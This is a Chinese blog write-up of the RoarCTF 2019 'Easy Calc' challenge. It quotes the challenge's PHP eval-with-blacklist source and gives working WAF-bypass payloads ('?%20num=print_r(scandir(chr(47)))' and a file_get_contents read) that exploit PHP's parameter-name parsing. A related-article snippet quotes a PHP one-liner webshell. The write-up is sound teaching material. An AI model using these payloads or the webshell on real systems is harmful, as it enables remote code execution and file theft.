[RoarCTF 2019]Easy Calc(WAF PHP的字符串解析特性bypass)

最新推荐文章于 2022-09-02 18:32:11 发布
最新推荐文章于 2022-09-02 18:32:11 发布
阅读量328 收藏
点赞数
分类专栏: buuctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44348894/article/details/105869071
版权

进入题目:
在这里插入图片描述
有回显答案,使了一下:
在这里插入图片描述
老规矩F12:
在这里插入图片描述
有个calc文件,进去瞅瞅:
给了一些源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

过滤了一些敏感符号,随便传个参数试一下:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
应该是只能传入算术表达式或者数字,再加上前面题目给的绿字可以确信是要我们绕过WAF了。因为题目限制的是num,那么有没有一种方法,可以本身不是num但是被PHP解析后变成了num呢。

利用PHP的字符串解析特性Bypass

https://www.freebuf.com/articles/web/213359.html

因为题目没有给出flag文件的位置,所以还是要自己扫一下,之前做过无参RCE的题目,所以直接payload,因为/被过滤了,所以可以用chr(47)代替,

payload:?%20num=print_r(scandir(chr(47)))

得到:
在这里插入图片描述
紧接着用file_get_contents读取f1agg文件:

payload:?%20num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

拿到flag。

用+num也可:
在这里插入图片描述

k0f1i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RoarCTF 2019]Easy Calc
qq_44657899的博客
02-27 1369
这道题没什么思路直接看了wp,有两种解法: 一,利用PHP字符串解析特性Bypass: 参考文章:利用PHP字符串解析特性Bypass 也就是说,在这道题中PHP解析时'num'=' num'='+num',认为它们是同一个变量。 但是waf只认'num'而' num'和'+num'都不在范围内,这样就能绕过waf了。 所以 payload1: scandir("/")函数读取目录,/被过...
buuctf--[RoarCTF 2019]Easy Calc 1--WAF
llx101388627的博客
05-03 600
点击链接,进入默认页面: 是一个计算器的小应用 f12,查看源码可以得到提示: 这样我们知道有个calc.php文件,还有个num变量 同时还知道设置了WAF 现在查看calc.php: 因为显示了源码,我们也知道了会过滤一些输入 接下来开始正式解题: 首先WAF会限制我们对num的输入,不能出现字母 但是通过在num和?间加一个空格就可以绕过: 对比: 接下来,我们需要从文件夹里找出flag,这就需要我们通过scandir()函数读取文件夹里的文件,再用print_r输出: 不过由于 / 被过滤了,因此
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5813
Web类题目
HTTP请求走私漏洞
Atkx's Blog
04-11 4924
这里写自定义目录标题 [RoarCTF 2019]Easy Calc calc.php代码 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
RoarCTFweb题解
st0ut的博客
10-21 1776
前言 参加了RoarCTF,题目质量挺好的,学到了一些东西。在这里复现记录一下。 easy_calc 打开题目发现是一个计算器的功能,感觉计算器已经出过好多次了。查看源代码,发现了calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $st...
字符串hash算法比较
最新发布
09-20
字符串哈希算法是一种将任意长度的字符串映射到固定长度哈希值的算法,通常用于快速查找、数据索引和内存管理等。在计算机科学中,哈希函数的设计至关重要,因为它直接影响到哈希表的性能。本文将探讨几种经典的字符...
calc-php
02-10
"calc-php"是一个基于PHP开发的计算库或者项目,它可能是为了方便在PHP环境中进行各种数学计算而设计的。PHP是一种广泛使用的服务器端脚本语言,尤其适合于Web开发,可以嵌入到HTML中使用。这个"calc-php"库可能包含...
string-calc-kata:java中字符串计算器的实现,用于TDD Kata
07-07
标题 "string-calc-kata:java中字符串计算器的实现,用于TDD Kata" 提供了我们正在探讨的主题:一个用Java编程语言实现的字符串计算器,它特别设计用于进行测试驱动开发(TDD)的练习,也称为Kata。TDD是一种软件...
php-payment-commission-calc:PHP的付款佣金计算
04-10
1. git clone https://github.com/jasimjuwel/php-payment-commission-calc.git 2. composer install 正在运行的应用程序 1. php index.php input.csv 运行测试 在项目根目录中,运行以下命令 1. composer run-unit-...
MD5计算器 V1.2 (MD5Calc) 计算文件和字符串MD5值
03-12
字符串+文件MD5计算器(MD5calc)、绿色、小巧、实用、免费。 很多数据库中的密码等敏感字段都不值直接明文存储的,往往用MD5等算法,本计算器为MD5形式的密码重置提供了极大地方便。 网管员必备。至于反向破解,建议...
CTF [RoarCTF 2019]Easy Calc writeup PHP字符串解析特性Bypass http请求走私(HTTP Request Smuggling)
baynk的博客
04-04 1050
0x00 开干 一看这种easy的,就慌,每次被ctf打,哪是打ctf。。。 试了下,还真可以算。但是看网页没有动,是静态。 那这个结果肯定是前端的JS了。 JS使用ajax发送数据到calc.php,然后根据返回结果来显示。比如下面这样就是计算失败的。 而且上面提示,已经设置好了waf肯定也不是那么容易的,查看了头部和其它元素后,发现没有什么可以利用的,就去看了下calc.php &lt...
WEB 渗透题(二)
0xac001d09
12-09 1621
[ACTF2020 新生赛]Upload–上传 验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下 GFI89a <script language="php">eval($_POST['hello']) </script> 上传成功,显示 Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml 直接
buu web每日一题之[RoarCTF 2019]Easy Calc
shannidawang的博客
07-23 143
查看源码 提示看calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $b
PHP代码审计之函数漏洞(上)
JBlock的博客
03-13 5447
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞分为上下两节,此为上节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 文章目录前言正文intval()使用不当导致安全漏洞的分析switch()in_array()PHP弱类型的特性&quot;.&quot;被替换成&quot;_&quot;unsetserialize 和 unserialize漏洞session 反序列化漏洞MD5 comp...
BUUCTF__[RoarCTF 2019]Easy Calc_题解
风过江南乱的博客
05-11 950
一、看题 拿到题目 输入发现会显示简单的计算。 想到是不是ssti模板注入。 尝试{{1+1}}报错,行不通。 F12查看源码。发现存在WAF,访问 calc.php 。 尝试访问得到源代码。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r'
关于PHP代码审计的一些题目
Animation77的博客
09-07 1857
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
BUU CTF web(四)
0xdawn的博客
05-11 5200
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
初步学习http请求走私
m0_62422842的博客
09-02 1103
最先开始接触到http请求走私是在今年的iscc线上赛的一道题目,当时因为没有题目环境等种种原因没有复现这道题目,所以这次通过这篇文章了解什么是http请求走私攻击。
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 919
1、[极客大挑战 2019]EasySQL
[roarctf 2019]easy calc
03-16
在这个程序中,加密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志,我们就可以提交...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值